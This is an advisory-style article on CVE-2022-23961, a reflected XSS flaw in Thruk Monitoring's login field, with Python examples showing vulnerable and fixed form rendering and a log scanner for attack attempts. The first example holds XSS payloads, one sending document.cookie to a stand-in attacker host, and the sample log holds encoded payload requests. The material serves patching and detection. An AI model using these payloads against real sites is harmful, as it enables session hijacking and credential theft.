Thruk Monitoring XSS Flaw CVE-2022-23961 Lets Attackers Hijack
CVE-2022-23961 (CVSS 6.1) in Thruk Monitoring through 2.46.3 enables unauthenticated reflected XSS via the login field, risking session theft for admins.

Executive Summary
A reflected cross-site scripting (XSS) vulnerability in Thruk Monitoring, identified as CVE-2022-23961 with a CVSS score of 6.1, allows unauthenticated remote attackers to inject arbitrary JavaScript into the login page. The flaw affects all versions of Thruk through 2.46.3, a widely used web-based interface for Nagios and other monitoring systems. According to an advisory published by the German security firm usd AG, the vulnerability resides in the login field of the authentication form, where user-supplied input is not properly encoded before being reflected in the server's response. An attacker can craft a malicious link that, when opened by an administrator who holds an active Thruk session, executes JavaScript in Thruk's origin, potentially leading to session hijacking, credential theft, or further compromise of the monitoring infrastructure.
Technical Analysis
The vulnerability exists in the login form of Thruk Monitoring versions up to and including 2.46.3. The login field accepts user input and reflects it into the HTML response without adequate output encoding. This enables a reflected XSS attack: an unauthenticated attacker crafts a URL carrying a payload in the login parameter and tricks a victim, typically an administrator or operator, into opening it. When the victim's browser renders the login page, the injected script executes in the same origin as the Thruk application. From there it can read any cookie that lacks the HttpOnly flag and anything in local storage, and, whether or not the session cookie is readable, it can issue requests that the browser automatically decorates with the victim's existing session cookie, so actions are performed on the victim's behalf even when the cookie itself cannot be exfiltrated.
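The mechanism above, as an added Python example that is not code from the original article or from the Thruk project: a minimal login form renderer in three variants (verbatim reflection as the flaw is described, a half-fix that only strips angle brackets, and a correct fix that HTML-encodes the value for an attribute context), inspected with Python's own HTML parser the way a browser would tokenize it. The payloads, the form markup and the attacker host name are constructed for illustration; the attribute-context detail (quotes must be encoded too, not just `<` and `>`) is a general XSS point, not a statement about how Thruk's template was fixed.

```python
import html
from html.parser import HTMLParser

# Constructed payloads (not taken from the advisory). The first closes the
# value="" attribute and injects a <script> element; the second never leaves
# the <input> tag and instead adds an event handler, which survives a fix that
# only strips angle brackets.
PAYLOAD_SCRIPT_TAG = (
    '"><script>new Image().src="https://attacker.example/?c="'
    '+document.cookie</script>'
)
PAYLOAD_EVENT_HANDLER = '" autofocus onfocus="alert(document.domain)'

# Hypothetical form markup; the real Thruk template differs.
FORM_PREFIX = '<form method="post" action="/thruk/cgi-bin/login.cgi">'
FORM_SUFFIX = '<input type="password" name="password"></form>'


def render_login_unsafe(login: str) -> str:
    """Models the flaw: the submitted login value is reflected verbatim."""
    return f'{FORM_PREFIX}<input type="text" name="login" value="{login}">{FORM_SUFFIX}'


def render_login_angle_brackets_only(login: str) -> str:
    """A common half-fix: tag delimiters are encoded but quotes are not,
    so the payload can still break out of the attribute."""
    stripped = login.replace("<", "&lt;").replace(">", "&gt;")
    return f'{FORM_PREFIX}<input type="text" name="login" value="{stripped}">{FORM_SUFFIX}'


def render_login_safe(login: str) -> str:
    """Correct fix for an attribute context: encode &, <, >, " and '."""
    encoded = html.escape(login, quote=True)
    return f'{FORM_PREFIX}<input type="text" name="login" value="{encoded}">{FORM_SUFFIX}'


class ReflectionInspector(HTMLParser):
    """Tokenizes the rendered page and records what the reflection produced."""

    def __init__(self) -> None:
        super().__init__()
        self.script_tags = 0       # <script> elements the browser would execute
        self.event_handlers = 0    # on* attributes on any tag
        self.login_value = None    # what the browser sees as the login field value

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        attr_dict = dict(attrs)
        self.event_handlers += sum(1 for name in attr_dict if name.startswith("on"))
        if tag == "input" and attr_dict.get("name") == "login":
            self.login_value = attr_dict.get("value")


def inspect(page: str) -> dict:
    """Return counts of injected script tags / event handlers and the parsed login value."""
    parser = ReflectionInspector()
    parser.feed(page)
    parser.close()
    return {
        "script_tags": parser.script_tags,
        "event_handlers": parser.event_handlers,
        "login_value": parser.login_value,
    }


if __name__ == "__main__":
    print("unsafe, script payload:     ", inspect(render_login_unsafe(PAYLOAD_SCRIPT_TAG)))
    print("unsafe, handler payload:    ", inspect(render_login_unsafe(PAYLOAD_EVENT_HANDLER)))
    print("half-fix, handler payload:  ", inspect(render_login_angle_brackets_only(PAYLOAD_EVENT_HANDLER)))
    print("safe, script payload:       ", inspect(render_login_safe(PAYLOAD_SCRIPT_TAG)))
    print("safe, handler payload:      ", inspect(render_login_safe(PAYLOAD_EVENT_HANDLER)))
```

In the safe variant the parser reports the login value exactly as the attacker typed it, with no new script element and no event handler, which is the behaviour to verify when testing a patched Thruk: the payload should appear as literal text in the field, never as markup.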
The advisory from usd AG's HeRoLab provides no proof-of-concept code but confirms the attack vector is remote, requires no authentication, and targets the login form's input field. The CVSS 6.1 rating is the standard medium score for reflected XSS: network attack vector, low complexity and no privileges required, offset by required user interaction (the victim must open the link), with a scope change and low confidentiality and integrity impact and no availability impact. The practical impact is elevated by Thruk's role in centralized monitoring: a compromised session can expose host configurations and service states and, where the interface is configured to display command definitions, check commands that sometimes embed credentials.
Thruk is a Perl-based application that provides a unified web interface for Nagios, Icinga, Shinken, and other monitoring backends. It is commonly deployed in enterprise environments and managed service providers (MSPs) to aggregate alerts and dashboards. The login field vulnerability is particularly concerning because it can be exploited without any prior access to the system, and the reflected script runs with the privileges of the authenticated user who clicks the link.
Mitigations & Recommendations
Users of Thruk Monitoring should upgrade to version 2.46.4 or later, which the article identifies as including the fix for CVE-2022-23961; the patched releases encode the login value before reflecting it. For organizations unable to upgrade immediately, the following reduce exposure, with the caveats a practitioner should expect. Web application firewall rules that block reflected XSS payloads in the login parameter stop casual attempts but are routinely bypassed with alternative encodings, so treat them as a stopgap rather than a fix. A strict Content Security Policy on the Thruk interface blocks injected inline script only if inline script is actually disallowed (for example via nonces), and because monitoring dashboards commonly rely on inline scripts, such a policy must be tested before enforcement. Setting the session cookie with the HttpOnly, Secure and SameSite attributes limits cookie theft, though it does not stop script from acting on the victim's behalf within the page. Users should be warned about unsolicited links to the monitoring interface. Reviewing web server logs for login.cgi requests whose login parameter contains angle brackets, quotes, event-handler names or encoded equivalents can reveal exploitation attempts; note that the request line is logged percent-encoded, double encoding is a common evasion, and a payload delivered in a POST body will not appear in the access log without request body logging. Given the sensitivity of monitoring dashboards, isolating the Thruk interface behind a VPN or bastion host reduces exposure to external attackers, although it does not remove the risk from a link opened by an administrator who is already connected.
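The log review suggested above, as an added Python example that is not part of the original article and not a Thruk project tool. It parses Apache combined-style access log lines, restricts itself to requests for a path ending in `login.cgi` (the Thruk login CGI path in the sample lines is an assumption; adjust it to your deployment), decodes the `login` query parameter repeatedly so that double-encoded payloads are caught, and flags values containing characters a login name never needs. The log lines are constructed for illustration and include two attacker requests (one plain, one double-encoded), a benign login, a POST without a query string, and a name with an apostrophe to show the heuristic does not flag it.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-style access log lines (not real Thruk logs).
# Source addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Nov/2022:10:01:02 +0000] "GET /thruk/cgi-bin/login.cgi?login=alice HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
203.0.113.10 - - [01/Nov/2022:10:01:09 +0000] "POST /thruk/cgi-bin/login.cgi HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Nov/2022:10:05:33 +0000] "GET /thruk/cgi-bin/login.cgi?login=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 4400 "-" "curl/7.85.0"
198.51.100.7 - - [01/Nov/2022:10:06:01 +0000] "GET /thruk/cgi-bin/login.cgi?login=%2522%2520onfocus%253Dalert(1)%2520autofocus%253D%2522 HTTP/1.1" 200 4390 "-" "curl/7.85.0"
192.0.2.44 - - [01/Nov/2022:10:07:15 +0000] "GET /thruk/cgi-bin/login.cgi?login=o%27brien HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
"""

# Apache common/combined log format: client, identd, user, [timestamp], "request line", status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Tokens a login name never needs but an XSS payload for a double-quoted
# attribute does: tag delimiters, the quote that closes the attribute, a
# javascript: URL, or an on<event>= handler. Single quotes are deliberately
# not flagged here to avoid alerting on names such as o'brien.
XSS_MARKERS = re.compile(r'[<>"]|javascript:|\bon[a-z]+\s*=', re.IGNORECASE)


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Undo stacked percent-encoding so %253C (a double-encoded '<') is not missed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_login_requests(log_text: str) -> list:
    """Return one record per request whose login parameter looks like an XSS payload."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))
        if not parts.path.endswith("/login.cgi"):
            continue
        # parse_qs removes one layer of encoding; fully_decode handles the rest.
        for raw in parse_qs(parts.query, keep_blank_values=True).get("login", []):
            value = fully_decode(raw)
            if XSS_MARKERS.search(value):
                hits.append({"src": match.group("src"), "time": match.group("ts"), "login": value})
    return hits


if __name__ == "__main__":
    for hit in suspicious_login_requests(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["src"]} login={hit["login"]!r}')
```

Run against a real log with `suspicious_login_requests(open("access.log").read())`. The decoded value is kept in the record so an analyst can see the payload as the browser would have received it; the POST line produces nothing, which is the blind spot noted above.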